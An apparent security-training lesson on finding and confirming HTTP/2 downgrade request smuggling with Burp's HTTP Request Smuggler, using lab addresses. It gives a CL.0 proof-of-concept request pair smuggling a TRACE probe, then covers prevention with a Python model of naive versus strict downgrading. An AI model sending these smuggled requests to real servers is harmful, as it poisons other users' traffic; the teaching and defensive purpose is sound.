HTTP Attacks  

HTTP/2 Downgrading Tools & Prevention


After discussing how we can exploit HTTP request smuggling vulnerabilities in HTTP/2 settings, let's explore tools that can help us during identification and exploitation. Lastly, we will discuss how we can protect ourselves from HTTP/2 request smuggling vulnerabilities.


Tools of the Trade

We can again use the Burp Extension HTTP Request Smuggler to make our lives significantly easier when hunting for HTTP/2-related request smuggling vulnerabilities.

To start, we can send any HTTP/2 request to Burp Repeater. As an example, consider the following request:

GET /index.php?param1=HelloWorld HTTP/2
Host: http2.htb


We can then right-click the request and go to Extensions > HTTP Request Smuggler > CL.0:

[Screenshot: Burp Repeater context menu, Extensions > HTTP Request Smuggler > CL.0]

This opens a new window that is most likely too large for your screen. Leave everything at the default settings and press Enter to start the scan. Burp then scans for a CL.0 vulnerability in the background. This is the same type of vulnerability as the H2.CL vulnerability discussed in the previous section. It is also called a CL.0 vulnerability because the Content-Length (CL) header is set to 0 and the request body contains only the smuggled request.

We can see the result of the scan under Extensions > Installed. Select the HTTP Request Smuggler extension from the list, then select the Output tab at the bottom of the window. The result is printed to the UI and looks like this:

Queueing reuest scan: CL.0
Found issue: CL.0 desync: h2CL|TRACE /
Target: https://172.17.0.2
HTTP Request Smuggler repeatedly issued the attached request. After 1 attempts, it got a response that appears to have been poisoned by the body of the previous request. For further details and information on remediation, please refer to https://portswigger.net/research/browser-powered-desync-attacks
Evidence: 
======================================
GET /index.php HTTP/2
Host: 172.17.0.2:8443
Origin: https://wguglsurkz2.com


======================================
POST /index.php HTTP/1.1
Host: 172.17.0.2:8443
Origin: https://wguglsurkz2.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

TRACE / HTTP/1.1
X-YzBqv: 
======================================
POST /index.php HTTP/1.1
Host: 172.17.0.2:8443
Origin: https://wguglsurkz2.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

TRACE / HTTP/1.1
X-YzBqv: 
======================================

Burp tells us that the web application is vulnerable to CL.0 request smuggling and gives us a proof-of-concept request with which we can verify the finding of the automated scan. Let's verify the result using the following two requests taken from the above output. Request 1:

POST /index.php HTTP/1.1
Host: 172.17.0.2:8443
Origin: https://wguglsurkz2.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

TRACE / HTTP/1.1
X-YzBqv: 

Request 2:

GET /index.php HTTP/2
Host: 172.17.0.2:8443
Origin: https://wguglsurkz2.com


Create a tab group in Burp Repeater and ensure that the Update Content-Length option is unchecked for the first request (otherwise Burp would correct the header to the real body length and defeat the test). To verify that other users can be affected, we send the two requests one after the other via separate TCP connections, which gives us the following two responses. The first response has a 200 status code and contains the index page we requested:

[Screenshot: first response, 200 status code with the index page]

However, the second response has a 405 (Method Not Allowed) status code:

[Screenshot: second response, 405 status code]

This indicates that we successfully smuggled the TRACE request past the reverse proxy and influenced the second request, proving the request smuggling vulnerability with the help of the Burp extension HTTP Request Smuggler.


HTTP/2 Attacks Prevention

The main cause of the attacks described here is HTTP/2 downgrading. Reverse proxies should not rewrite HTTP/2 requests to HTTP/1.1. Instead, HTTP/2 should be implemented end-to-end so that no rewriting is required. Because the two protocol versions frame requests differently (HTTP/2 carries the body length in its frames, HTTP/1.1 relies on headers), minor deviations from the specifications in the implementation of reverse proxy and web server software can cause vulnerabilities such as request smuggling. Proper configuration and implementation of HTTP/2 prevent these issues entirely.
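To make the downgrading problem concrete, here is an added example (not code from the page, from Burp, or from any proxy product) that models what a reverse proxy does when it rewrites an HTTP/2 request to HTTP/1.1, and what the back-end's HTTP/1.1 parser then sees. The names `H2Request`, `downgrade_naive`, `downgrade_strict` and `backend_parse` are made up for this illustration; the crafted request is constructed to match the shape reported in the Burp output above. The naive rewrite passes a client-supplied `content-length` through unchanged, so the back-end finishes the request early and keeps the remaining bytes for the next request on the connection. The strict rewrite derives Content-Length from the actual DATA frame payload and rejects a request whose declared length disagrees with it, which is what RFC 9113 section 8.1.1 requires.

```python
# Added example: a toy model of HTTP/2 -> HTTP/1.1 downgrading at a reverse
# proxy and of the back-end HTTP/1.1 parser. Not from the page or any product;
# all names are hypothetical.
from dataclasses import dataclass


@dataclass
class H2Request:
    # What the front-end holds after decoding the HEADERS frame(s): the
    # pseudo-headers, the regular (lowercase) headers, and the concatenated
    # DATA frame payload, whose true length is known from the framing.
    method: str
    path: str
    authority: str
    headers: dict
    body: bytes


def _serialize(req, content_length):
    """Emit the HTTP/1.1 form of the request with the given Content-Length."""
    lines = [f"{req.method} {req.path} HTTP/1.1", f"Host: {req.authority}"]
    for name, value in req.headers.items():
        if name != "content-length":
            lines.append(f"{name}: {value}")
    lines.append(f"Content-Length: {content_length}")
    return ("\r\n".join(lines) + "\r\n\r\n").encode() + req.body


def downgrade_naive(req):
    """Vulnerable rewrite: trusts a client-supplied content-length header and
    copies it verbatim, so front-end and back-end can disagree about where the
    request ends (the H2.CL / CL.0 situation)."""
    declared = req.headers.get("content-length", str(len(req.body)))
    return _serialize(req, declared)


def downgrade_strict(req):
    """Hardened rewrite: Content-Length always comes from the DATA frame payload.
    A declared content-length that disagrees with the frames makes the request
    malformed (RFC 9113 section 8.1.1), so it is rejected instead of forwarded."""
    declared = req.headers.get("content-length")
    if declared is not None and declared != str(len(req.body)):
        raise ValueError("malformed request: content-length does not match DATA frames")
    return _serialize(req, len(req.body))


def backend_parse(stream):
    """Minimal HTTP/1.1 request parser as a back-end sees one connection.
    Returns the request line of every complete request plus the leftover bytes;
    leftover bytes would be prepended to the next request on the connection,
    which is how a smuggled prefix poisons another user's request."""
    requests = []
    while True:
        end = stream.find(b"\r\n\r\n")
        if end == -1:
            break
        head = stream[:end].decode("latin-1").split("\r\n")
        length = 0
        for line in head[1:]:
            name, _, value = line.partition(":")
            if name.strip().lower() == "content-length":
                length = int(value.strip())
        if len(stream) < end + 4 + length:
            break  # body not fully received yet
        requests.append(head[0])
        stream = stream[end + 4 + length:]
    return requests, stream


# Constructed request: content-length declared as 0 while a body is shipped,
# the same shape the Burp evidence above shows.
CRAFTED = H2Request(
    "POST", "/index.php", "172.17.0.2:8443",
    {"content-type": "application/x-www-form-urlencoded", "content-length": "0"},
    b"TRACE / HTTP/1.1\r\nX-YzBqv: \r\n",
)

# Constructed benign request with no declared length at all.
BENIGN = H2Request(
    "POST", "/index.php", "172.17.0.2:8443",
    {"content-type": "application/x-www-form-urlencoded"},
    b"param1=HelloWorld",
)


def demo():
    """Compare what the back-end sees after each kind of downgrade."""
    naive_seen, naive_left = backend_parse(downgrade_naive(CRAFTED))
    try:
        downgrade_strict(CRAFTED)
        strict_result = "forwarded"
    except ValueError as exc:
        strict_result = f"rejected: {exc}"
    benign_seen, benign_left = backend_parse(downgrade_strict(BENIGN))
    return {
        "naive": (naive_seen, naive_left),
        "strict": strict_result,
        "benign": (benign_seen, benign_left),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

Running the block shows the naive path handing the back-end one complete POST plus a dangling `TRACE / HTTP/1.1` prefix, the strict path rejecting the crafted request outright, and the benign request passing through with no leftover bytes.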
